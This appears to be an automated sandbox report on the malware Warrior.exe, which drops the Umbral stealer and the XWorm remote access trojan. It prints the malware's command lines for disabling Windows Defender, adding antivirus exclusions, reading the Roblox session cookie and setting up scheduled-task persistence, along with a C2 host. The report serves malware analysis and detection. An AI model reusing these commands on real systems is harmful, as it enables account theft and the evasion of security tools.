Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-04-2024 22:43

General

  • Target

    Warrior.exe

  • Size

    3.0MB

  • MD5

    77af0ed58685722c2f9596fed1e5bd84

  • SHA1

    0a09622ffbc63932f11af84934d256d5e790ffeb

  • SHA256

    0545c17e579fc2df5185855e51425ec4d32da26075c02a0cf1af0221aa9b9a18

  • SHA512

    e557de1d3a4115276520ed5775c7a6fb5688cf40021b62ed5243c03783d1ad09722190f0234006c16cb9978982541c4eabd6ffefbfc1d063d341d4cf620ff140

  • SSDEEP

    3072:XVbxrc9pqjTrUWHdkxq+G3DmWuQk/moeRiR85MpMj:FbVQgzHkAyWunbje

Malware Config

Extracted

Family

xworm

C2

accommodation-confidentiality.gl.at.ply.gg:19058

Attributes
  • Install_directory

    %AppData%

  • install_file

    svhost.exe

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Warrior.exe
    "C:\Users\Admin\AppData\Local\Temp\Warrior.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4176
    • C:\Users\Admin\AppData\Local\Temp\winadll.exe
      "C:\Users\Admin\AppData\Local\Temp\winadll.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:536
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\winadll.exe"
        3⤵
        • Views/modifies file attributes
        PID:4180
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\winadll.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2356
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1200
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3472
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5000
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:4400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:404
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:3100
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\winadll.exe" && pause
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4216
          • C:\Windows\system32\PING.EXE
            ping localhost
            4⤵
            • Runs ping.exe
            PID:1796
      • C:\Users\Admin\AppData\Local\Temp\WarriorX.exe
        "C:\Users\Admin\AppData\Local\Temp\WarriorX.exe"
        2⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2424
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WarriorX.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4480
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WarriorX.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3308
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4824
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
          3⤵
          • Creates scheduled task(s)
          PID:2152
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1732 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:5008
      • C:\Users\Admin\AppData\Roaming\svhost.exe
        C:\Users\Admin\AppData\Roaming\svhost.exe
        1⤵
        • Executes dropped EXE
        PID:2248
      • C:\Users\Admin\AppData\Roaming\svhost.exe
        C:\Users\Admin\AppData\Roaming\svhost.exe
        1⤵
        • Executes dropped EXE
        PID:2260

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svhost.exe.log

        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        65a68df1062af34622552c4f644a5708

        SHA1

        6f6ecf7b4b635abb0b132d95dac2759dc14b50af

        SHA256

        718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35

        SHA512

        4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        dd1d0b083fedf44b482a028fb70b96e8

        SHA1

        dc9c027937c9f6d52268a1504cbae42a39c8d36a

        SHA256

        cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

        SHA512

        96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        3a6bad9528f8e23fb5c77fbd81fa28e8

        SHA1

        f127317c3bc6407f536c0f0600dcbcf1aabfba36

        SHA256

        986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

        SHA512

        846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        cadef9abd087803c630df65264a6c81c

        SHA1

        babbf3636c347c8727c35f3eef2ee643dbcc4bd2

        SHA256

        cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

        SHA512

        7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        3505effaead0f06d098f1aec01836881

        SHA1

        94bafdbeb2f5adbd8cec709574df5b8dbcc5eba3

        SHA256

        5d39a25ff8842c7c14aa14f99c5e3e1606fb7516c57f03dc41069df3c3de0517

        SHA512

        934d8eab5bc2ec20e800c668f3c3434829feade4771918a22d712f7ba39f91f93877a1e9dc1beac966646af0c9dd2cf118041535143b3abc585fea8dfb1299f5

      • C:\Users\Admin\AppData\Local\Temp\WarriorX.exe

        Filesize

        76KB

        MD5

        fb32e91cc34d5e0c6352930f5a2a285f

        SHA1

        62df943998e34c28269e9c6f8ee2182b2cbb4318

        SHA256

        8e55921d7a4faf0365b3d3ebf79604fe0272bd0261108ec91b41d47a22cd13cb

        SHA512

        31c8d7776b615457e405b827f1805ecc4d6e7e8d6c69004bd1a9fcefd863650d478c7b78042b00da470ba822e2746a54851ab344b5f616f54519215d15fbf828

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppdwwj5v.h0m.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\winadll.exe

        Filesize

        231KB

        MD5

        89f302fc3a4099220cccb91a9ff7859a

        SHA1

        5587a4b0134b0f2427a7f0577d4ff77d733658d9

        SHA256

        f1591132b9e3064c13801373dba6ae5d245981690f7639efbc3bb15a89354730

        SHA512

        a7de469b8b1e93110f01b61c0f0d6d736f241ef5fc9e50fa2982ab6d85c445e12b4015b1734c3a8367ffb4a290824a208b5205f100ea8360e878c9358eb59c92

      • memory/536-136-0x000002A0FC2A0000-0x000002A0FC2AA000-memory.dmp

        Filesize

        40KB

      • memory/536-22-0x000002A0FBD90000-0x000002A0FBDD0000-memory.dmp

        Filesize

        256KB

      • memory/536-81-0x000002A0FC260000-0x000002A0FC27E000-memory.dmp

        Filesize

        120KB

      • memory/536-27-0x00007FFD3FDC0000-0x00007FFD40881000-memory.dmp

        Filesize

        10.8MB

      • memory/536-80-0x000002A0FC310000-0x000002A0FC360000-memory.dmp

        Filesize

        320KB

      • memory/536-159-0x00007FFD3FDC0000-0x00007FFD40881000-memory.dmp

        Filesize

        10.8MB

      • memory/536-77-0x000002A0FE580000-0x000002A0FE5F6000-memory.dmp

        Filesize

        472KB

      • memory/536-137-0x000002A0FC2E0000-0x000002A0FC2F2000-memory.dmp

        Filesize

        72KB

      • memory/2356-38-0x000002D04C1F0000-0x000002D04C212000-memory.dmp

        Filesize

        136KB

      • memory/2424-30-0x00007FFD3FDC0000-0x00007FFD40881000-memory.dmp

        Filesize

        10.8MB

      • memory/2424-31-0x000000001B960000-0x000000001B970000-memory.dmp

        Filesize

        64KB

      • memory/2424-29-0x0000000000C80000-0x0000000000C9A000-memory.dmp

        Filesize

        104KB

      • memory/2424-160-0x00007FFD3FDC0000-0x00007FFD40881000-memory.dmp

        Filesize

        10.8MB

      • memory/2424-161-0x000000001B960000-0x000000001B970000-memory.dmp

        Filesize

        64KB

      • memory/4176-1-0x00007FFD3FDC0000-0x00007FFD40881000-memory.dmp

        Filesize

        10.8MB

      • memory/4176-2-0x0000000002E20000-0x0000000002E30000-memory.dmp

        Filesize

        64KB

      • memory/4176-28-0x00007FFD3FDC0000-0x00007FFD40881000-memory.dmp

        Filesize

        10.8MB

      • memory/4176-0-0x0000000000BD0000-0x0000000000C14000-memory.dmp

        Filesize

        272KB